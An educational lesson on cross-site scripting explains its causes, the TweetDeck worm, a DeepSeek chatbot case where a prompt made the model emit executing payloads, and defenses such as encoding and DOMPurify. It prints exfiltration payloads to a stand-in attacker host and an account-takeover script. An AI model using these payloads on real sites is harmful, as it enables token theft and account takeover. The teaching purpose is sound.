What is Cross-Site Scripting?
Cross-Site Scripting has been around for over 25 years. It was one of the first web vulnerabilities ever documented, and it's still here.
Not because we don't know how to fix it.
We do. It's still here because the browser's HTML parser cannot tell the difference between markup we intended and markup an attacker injected.
If both arrive in the same response, they are parsed and executed the same way.
What you will learn in this lesson
- How XSS fits into the broader family of injection attacks and why it has remained prevalent for decades.
- What actually happens in the browser when an XSS payload executes, and why it’s so powerful.
- Real-world XSS incidents (TweetDeck, DeepSeek) and what specifically went wrong in their implementations.
- How common app patterns (rich text comments, AI-rendered content, and unsafe HTML rendering APIs) turn into XSS entry points.
A quick note on the name: "Cross-Site Scripting" is a historical artifact from the late 1990s, when the primary attack involved stealing data across different websites.
The name stuck, but it's misleading.
Modern XSS attacks don't necessarily cross sites, and they're not limited to scripting. The abbreviation "XSS" (not "CSS," which was already taken by Cascading Style Sheets) is what everyone uses.
The simplest explanation
Every time our application takes something from the outside world (a user comment, a URL parameter, an API response) and puts it on a page without telling the browser "treat this as data, not markup," we've created a potential entry point for XSS.
XSS is a type of injection attack.
The attacker finds a way to run their JavaScript in someone else's browser, in the context of our application. The browser executes it because nothing in the response distinguished the attacker's payload from our legitimate code.
What makes this serious is what happens after the injection.
Once malicious JavaScript runs in a user's browser session, it has access to everything the session can access: tokens in localStorage, the DOM (the Document Object Model, the browser's live representation of the page, the element tree we see in DevTools), form inputs, and the ability to make authenticated API requests.
The browser doesn't know the difference between our code and the attacker's code. It all came from the same origin, so it all gets the same permissions.
This is similar to SQL injection in concept. Consider the difference:
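A minimal sketch of that parallel, with a made-up SQL table and a trivial payload:

```javascript
// SQL injection: user input concatenated into a query string.
const userInput = "' OR '1'='1";
const query = "SELECT * FROM users WHERE name = '" + userInput + "'";
// The quote in the input terminates the string literal, so the rest
// of the input becomes part of the SQL command itself.
console.log(query);
// → SELECT * FROM users WHERE name = '' OR '1'='1'

// XSS: user input concatenated into HTML.
const comment = "<script>alert(1)</script>";
const html = "<p>" + comment + "</p>";
// The angle brackets in the input become real markup, so the browser
// parses the "data" as a script element and executes it.
console.log(html);
// → <p><script>alert(1)</script></p>
```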
In both cases, the application expects a string, but the input gets interpreted as part of a command or markup structure.
The root cause is the same: a failure to maintain the boundary between data and code.
For SQL, we use parameterized queries that structurally separate the command from the data.
For XSS, we use output encoding or sanitization that structurally separates the markup from the user content.
This has happened before. To big names.
In June 2014, a 19-year-old Austrian computer science student named Firo was experimenting with how TweetDeck handled the Unicode heart character (♥).
He noticed something odd: TweetDeck wasn't escaping the character. It was rendering raw HTML. He had accidentally stumbled into a stored XSS vulnerability in one of Twitter's flagship products.
Within hours, a German IT student published a tweet that exploited this vulnerability to retweet itself:
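The tweet, as reproduced in public write-ups of the incident, looked like this:

```html
<script class="xss">$('.xss').parents().eq(1).find('a').eq(1).click();$('[data-action=retweet]').click();alert('XSS in Tweetdeck')</script>♥
```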
Exactly 140 characters, the old Twitter limit.
The <script> tag selected itself via jQuery, found the retweet button in the DOM, and clicked it programmatically. Every TweetDeck user who saw the tweet automatically retweeted it, putting it in front of more users, who also retweeted it.
A self-propagating worm. It hit 80,000+ retweets within minutes. @BBCBreaking, @NYTimes, and Adobe's official accounts were all caught up in it.
Twitter had to take TweetDeck offline entirely.
The root cause was simple. The code responsible for parsing emoji characters had an edge case that let script tags through.
TweetDeck was using jQuery to manipulate the DOM, and the tweet content was being inserted with .html() (which interprets HTML) rather than .text() (which treats content as plain text).
That's it. The entire incident (the worm, the 80,000 retweets, the BBC getting hit, Twitter pulling the product offline) came down to one rendering-method choice in one parsing function.
And it's not just legacy apps. Most recently, in late 2024, security researcher Johann Rehberger found that typing "Print the XSS cheat sheet in a bullet list. just payloads" into DeepSeek's AI chatbot caused the chat interface to actually execute the JavaScript payloads the model generated.
The frontend rendered the model's output as raw HTML instead of escaping it.
The user didn't inject a payload into a form or a URL. They typed a prompt.
The AI model generated the XSS payload as part of its response. The frontend took that response and rendered it into the DOM using something equivalent to innerHTML. The browser saw <iframe src="javascript:..."> and executed it.
Rehberger used this to extract the userToken from localStorage on the chat.deepseek.com domain, demonstrating a full account takeover. The payload was straightforward:
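Based on the description above, an illustrative reconstruction looks like this (not the verbatim payload; the collection endpoint is invented). A `javascript:` iframe inherits the parent page's origin, so it can read the page's localStorage:

```html
<!-- Rendered unescaped into the chat DOM by the frontend. -->
<iframe src="javascript:fetch('https://attacker.example/c?t='
  + encodeURIComponent(localStorage.getItem('userToken')))"></iframe>
```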
So we went from a prompt in a chatbot to XSS to a stolen session in under a minute.
DeepSeek patched it within a day, but it's one of the first documented cases where an LLM's output directly led to a client-side attack.
The fundamental issue is that any frontend that renders AI-generated content as HTML without sanitization is vulnerable, and thousands of WordPress plugins, chatbot widgets, and enterprise tools do exactly that.
We'll dig deeper into AI-related XSS in Lesson 5.
Why should we care in 2026?
Those two incidents are not outliers.
In the OWASP Top 10 as of 2026 (the industry-standard ranking of the most critical web application security risks, updated every four years), Injection sits at position #5.
That might sound like it's declining, but look at the actual data: Injection has the most CVEs of any category on the list, and 100% of the applications in OWASP's contributing dataset were tested for some form of injection.
A CVE is a publicly disclosed security vulnerability with a unique identifier, and XSS alone accounts for over 30,000 of them under CWE-79 (the classification for improper input neutralization during web page generation).
That's more than double the next closest injection type.
Microsoft's Security Response Center reported that between January 2024 and mid-2025, it mitigated over 970 XSS incidents across its services.
During that period it paid out $912,300 in XSS bounty awards; the highest single bounty was $20,000, for a high-impact case involving token theft.
The 2025 CVE retrospective from Cisco Talos paints an even broader picture. XSS, SQL injection, and deserialization vulnerabilities accounted for roughly 10,000 CVEs in 2025 alone.
That is 132 vulnerabilities per day across the entire landscape. The exploitation window is shrinking. In early 2025, about 28% of exploits were launched within a single day of disclosure.
XSS is not a solved problem. Not even close.
How an XSS attack actually works
Let's walk through a scenario that's closer to the code most of us write every day.
We're building a blog. At the bottom of every article, there's a comment section. The product team wants users to format their comments with bold, italics, and maybe images. So we use a rich text editor and render the output to HTML.
Here's where it goes wrong.
An attacker posts a comment. It looks innocent in the editor, but the raw HTML that gets saved to the database looks like this:
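Something like this (the attacker's collection domain is a placeholder):

```html
<p>Great article, thanks for sharing!</p>
<img src="https://example.com/pixel.gif"
     onload="fetch('https://attacker.example/collect', {
       method: 'POST',
       body: localStorage.getItem('auth_token')
     })">
```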
That's not a <script> tag. It's an <img> tag, a perfectly valid HTML element, but its onload event handler fires when the image loads and POSTs the user's authentication token from localStorage to an external server.
The user never sees anything happen. The page looks exactly the same.
Why localStorage.getItem('auth_token') and not document.cookie?
Because in most well-configured modern applications, session cookies are set with the HttpOnly flag, which means JavaScript can't read them.
Attackers know this. So they go after what JavaScript can read: tokens stored in localStorage (where many SPAs store JWTs), sessionStorage data, or skip exfiltration and make authenticated API calls directly from the XSS context.
Here's the attack step by step:
- The attacker discovers the application renders comments using `dangerouslySetInnerHTML`, `v-html`, or `innerHTML` without sanitization.
- The attacker submits a comment containing the hidden `<img>` tag with an `onload` handler. The comment looks normal in the editor.
- The comment is saved to the database alongside all other comments. Nothing distinguishes it from a legitimate comment at the data layer. (Here we might add some backend validation.)
- A victim visits the article. The application fetches all comments from the API and renders them as HTML.
- The browser parses the `<img>` tag, loads the image source, and fires the `onload` event handler. The victim's `auth_token` is POSTed to the attacker's server.
- The attacker now has the victim's authentication token and can impersonate them, or the attacker's script has already made API calls (changing email, resetting password) directly from the victim's session.
That's one comment affecting every single user who opens the article.
What can an attacker actually do?
The blog comment attack above stole a token. But that's just one option. Once JavaScript executes in a user's browser, the attacker can do much more.
The scarier option is that the attacker doesn't even need to steal anything. They can make authenticated API calls directly. The script runs in the user's session, so it can call any API endpoint the user has access to, with the user's cookies and headers automatically included by the browser. Here's what this looks like in practice:
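A sketch of what such an injected script can do from the victim's session. The endpoint paths and attacker address are made up for illustration; the fetch implementation is passed in so the logic is easy to follow:

```javascript
// Runs inside the victim's page, so requests go to the app's own origin
// and the browser attaches the victim's session cookie automatically.
async function takeoverFromXss(fetchImpl) {
  // 1. Change the account email to one the attacker controls.
  await fetchImpl('/api/account/email', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ email: 'attacker@evil.example' }),
  });
  // 2. Request a password reset. The link now lands in the attacker's inbox.
  await fetchImpl('/api/account/password-reset', {
    method: 'POST',
    credentials: 'include',
  });
}
```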
The victim sees nothing. The attacker receives a password reset link for the victim's account. Full takeover, no token exfiltration required. This works even if every cookie is HttpOnly and Secure, even if there's no JWT in localStorage.
The browser sends the session cookie automatically because the request originates from the same domain.
Beyond that, the attacker can modify the page (swap out a login form with a fake one that captures credentials), attach event listeners to every input on the page to capture keystrokes, redirect users to phishing pages, or just read everything on the current page and send it to their server. Personal data, financial information, private messages, whatever the page displays, is accessible to the script.
And this is just what's possible with "traditional" XSS.
In 2025 and 2026, XSS payloads are being combined with OAuth token theft (Lesson 4), prompt injection attacks against AI chatbots (Lesson 5), and supply chain attacks that inject XSS into trusted third-party scripts (Lesson 3).
The three types of XSS
XSS comes in three flavors. We'll cover each one in depth with full code examples in Lesson 2, but here's what they are:
Stored XSS is what we just described. The malicious payload gets saved to the server and served to every user who loads that content. The victim just visits the page, no click required. The TweetDeck worm was stored XSS.
Reflected XSS happens when user input gets bounced back in the server's response without being stored. Think search pages that show "You searched for: [whatever]" where [whatever] isn't encoded. The attacker crafts a URL containing the payload and tricks the victim into clicking it via phishing or social media. The payload lives in the URL, not in the database.
DOM-based XSS is the client-side variant. The server never even sees the malicious input. Instead, client-side JavaScript reads data from a source (such as window.location.hash) and writes it to the page via a dangerous sink (such as innerHTML). The server's access logs show a clean request. The attack happens entirely in the browser. According to Google's Vulnerability Rewards Program data, DOM XSS is consistently the most common XSS variant they see reported, and it's getting more common as SPAs do more client-side DOM manipulation.
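A minimal sketch of a vulnerable page, assuming a hypothetical greeting widget that reads the URL fragment:

```html
<!-- Victim is lured to: https://example.com/welcome#<img src=x onerror=alert(1)> -->
<div id="greeting"></div>
<script>
  // Source: attacker-controlled URL fragment. Sink: innerHTML.
  // The fragment never reaches the server, so server logs stay clean.
  const name = decodeURIComponent(location.hash.slice(1));
  document.getElementById('greeting').innerHTML = 'Welcome, ' + name;
</script>
```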
Lesson 2 breaks down all three types with concrete code examples across React, Vue, Angular, and Vanilla JS.
Frameworks help, but they're not enough
React, Vue, Angular, and most modern frameworks apply output encoding by default. When we use standard data binding ({data} in JSX, {{data}} in Vue/Angular templates), the framework converts characters like `<` into `&lt;` before inserting them into the DOM.
Without encoding, the browser executes the attack invisibly. With encoding, the user sees the literal text <script>alert(1)</script> printed on the page as harmless characters.
This is great, and it automatically prevents the most basic class of XSS. But every framework has escape hatches (dangerouslySetInnerHTML in React, v-html in Vue) that bypass encoding.
React doesn't validate href attributes, so javascript: URLs execute on click.
Third-party npm components can use innerHTML internally without the developer knowing.
Server-side rendering with string concatenation also bypasses React's encoding.
We'll break down exactly where each framework falls short in Lesson 3, with vulnerable and fixed code examples.
How to think about defense: context-sensitive output handling
Now that we've seen how attacks work and where frameworks fall short, the question is: what's the right way to handle user data?
The answer depends on the context in which the data ends up on the page.
People say, "Just encode your output" or "Just sanitize your input." Neither statement is complete.
The correct answer is to apply the appropriate treatment for the specific context in which the data will be consumed.
HTML body context. If user data goes into an HTML body as text content, we need HTML entity encoding. `<` becomes `&lt;`, `>` becomes `&gt;`, and the browser renders them as literal visible text instead of parsing them as markup. This is what frameworks do automatically with default data binding.
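A minimal entity encoder, as a sketch of what frameworks do under the hood (in practice, rely on the framework's default binding or a vetted library rather than hand-rolling this):

```javascript
// Encode the five characters that matter in HTML text and attribute content.
function encodeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')   // must run first, or we double-encode entities
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

console.log(encodeHtml('<script>alert(1)</script>'));
// → &lt;script&gt;alert(1)&lt;/script&gt;
```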
HTML attribute context. If user data goes into an HTML attribute, we need attribute encoding. An unquoted attribute can be broken out of with a space character. Always quote attributes, and encode ", ', &, <, and >.
JavaScript context. If user data goes into a JavaScript context (inside a <script> block, or an inline event handler), HTML encoding won't save us because the JavaScript parser runs after the HTML parser. Ideally, don't put user data into JavaScript contexts. Place the data in a data- attribute and read it from the DOM.
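A sketch of that data- attribute pattern (element id and attribute name are made up):

```html
<!-- The server/template writes user data into an attribute, with
     attribute encoding, never into a <script> block. -->
<div id="config" data-username="ATTRIBUTE_ENCODED_USER_DATA"></div>
<script>
  // JavaScript reads it back as plain data via the dataset API;
  // nothing here is ever parsed as code.
  const username = document.getElementById('config').dataset.username;
</script>
```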
URL context. If user data goes into a URL (like an href or src attribute), encoding alone doesn't help because javascript:alert(1) is a valid, properly-encoded URL that executes JavaScript when clicked. The defense is protocol validation: parse the URL and check that the protocol is http: or https:.
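A sketch of that protocol validation using the standard URL constructor (the base URL is a placeholder so relative links resolve and pass the check):

```javascript
// Allowlist-based URL check: parse, then compare the protocol.
function isSafeUrl(value, base = 'https://example.com/') {
  try {
    const url = new URL(value, base);
    return url.protocol === 'http:' || url.protocol === 'https:';
  } catch {
    return false; // unparseable input is rejected, not trusted
  }
}

console.log(isSafeUrl('https://example.com/page')); // → true
console.log(isSafeUrl('javascript:alert(1)'));      // → false
```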
HTML context (rich content). If user data needs to be rendered as HTML (the rich text editor scenario), encoding destroys the functionality. We want <strong>bold</strong> to actually render as bold. In this case, we need HTML sanitization: parsing the HTML and stripping everything except an allowlist of safe tags and attributes. This is what DOMPurify does:
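A browser-side sketch, assuming DOMPurify has been added to the project (for example via npm install dompurify) and a comment container exists in the page:

```javascript
import DOMPurify from 'dompurify';

const dirty = '<strong>bold</strong><img src="x" onerror="alert(1)">';

// Zero-config sanitize: allowlisted tags like <strong> and <img> survive,
// while the onerror event handler and anything else off the allowlist
// is stripped out.
const clean = DOMPurify.sanitize(dirty);

// Safe to render now.
document.getElementById('comment').innerHTML = clean;
```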
DOMPurify is maintained by Cure53, a German cybersecurity firm that specializes in finding XSS vulnerabilities.
It's the sanitizer recommended by OWASP, MDN, and Google. With zero configuration, it's already safe.
It uses an allowlist approach, where only known-safe elements survive, which is fundamentally more secure than enumerating dangerous patterns.
We'll cover DOMPurify configuration, integration patterns with React/Vue/Angular, and its limitations in detail in Lesson 6.
Here's the quick reference for all five contexts:
| Context | Example | Danger | Defense |
|---|---|---|---|
| HTML body | `<p>USER_DATA</p>` | Data parsed as HTML tags | HTML entity encoding (`<` → `&lt;`) |
| HTML attribute | `<input value="USER_DATA">` | Break out of attribute, add event handler | Attribute encoding, always quote attributes |
| JavaScript | `<script>var x = "USER_DATA"</script>` | Break out of string, execute code | Avoid it; use `data-` attributes |
| URL | `<a href="USER_DATA">` | `javascript:` protocol executes code | URL validation (allowlist `http:`/`https:`) |
| Rich HTML | `<div>USER_HTML_CONTENT</div>` | Arbitrary tags and event handlers | HTML sanitization (DOMPurify) |
This table is the foundation for every defense in this module. We'll keep coming back to it.
Check your code right now
Before moving to Lesson 2, here's something concrete to do. Open our project and search for dangerouslySetInnerHTML, v-html, and innerHTML.
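One way to run that search from the command line, shown here against a tiny demo tree so the command is self-contained (point it at your real source directory instead):

```shell
# Demo file containing one of the risky sinks (stand-in for a real project).
mkdir -p demo/src
echo 'el.innerHTML = userComment;' > demo/src/app.js

# Search for the three sinks; every hit is a line worth reviewing.
grep -rnE "dangerouslySetInnerHTML|v-html|innerHTML" demo/src/
```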
For every result, ask one question: where does the data come from? If it comes from user input, an API, a database, or any source outside our direct control, and it's not being sanitized, we've found a potential XSS vulnerability.
We'll build this into a comprehensive audit checklist in Lesson 7.
What we'll cover in this module
Here's the path through the next six lessons: Lesson 2 covers the three XSS types in depth. Lesson 3 goes into framework-specific vulnerabilities in React, Vue, Angular, and vanilla JavaScript. Lesson 4 shows how an XSS vulnerability escalates into full account takeover via OAuth. Lesson 5 covers AI-generated XSS, prompt injection, and LLM-rendered payloads. Lesson 6 introduces the browser-native defense stack: CSP, Trusted Types (which hit cross-browser support in February 2026), and the Sanitizer API. Lesson 7 ties it all together with a practical audit checklist.
In Lesson 2, we'll break down Stored, Reflected, and DOM-based XSS with concrete code examples that show exactly how each works and where to find them in real applications.
References and more reading material
- OWASP, "Top 10:2025" https://owasp.org/Top10/
- OWASP, "Cross Site Scripting Prevention Cheat Sheet" https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
- MSRC, "Trends, challenges, and strategic shifts in the XSS landscape" (2024) https://msrc.microsoft.com/blog/2024/11/trends-challenges-and-strategic-shifts-in-the-xss-landscape/
- Cisco Talos, "Talos 2025 CVE Retrospective" https://blog.talosintelligence.com/talos-2025-cve-retrospective/
- Sucuri, "Serious Cross Site Scripting Vulnerability in TweetDeck" (2014) https://blog.sucuri.net/2014/06/serious-cross-site-scripting-vulnerability-in-tweetdeck-twitter.html
- Johann Rehberger, "DeepSeek AI: From Prompt Injection To Account Takeover" (Embrace The Red, 2024) https://embracethered.com/blog/posts/2024/deepseek-ai-prompt-injection-to-xss-and-account-takeover/
- The Hacker News, "DeepSeek AI Database Exposed" https://thehackernews.com/2025/01/deepseek-ai-database-exposed-over-1.html
- MDN, "Cross-site scripting (XSS)" https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/XSS
- DOMPurify by Cure53 (HTML sanitizer) https://github.com/cure53/DOMPurify
- Snyk Learn, "Cross-site scripting (XSS)" https://learn.snyk.io/lesson/xss-cross-site-scripting/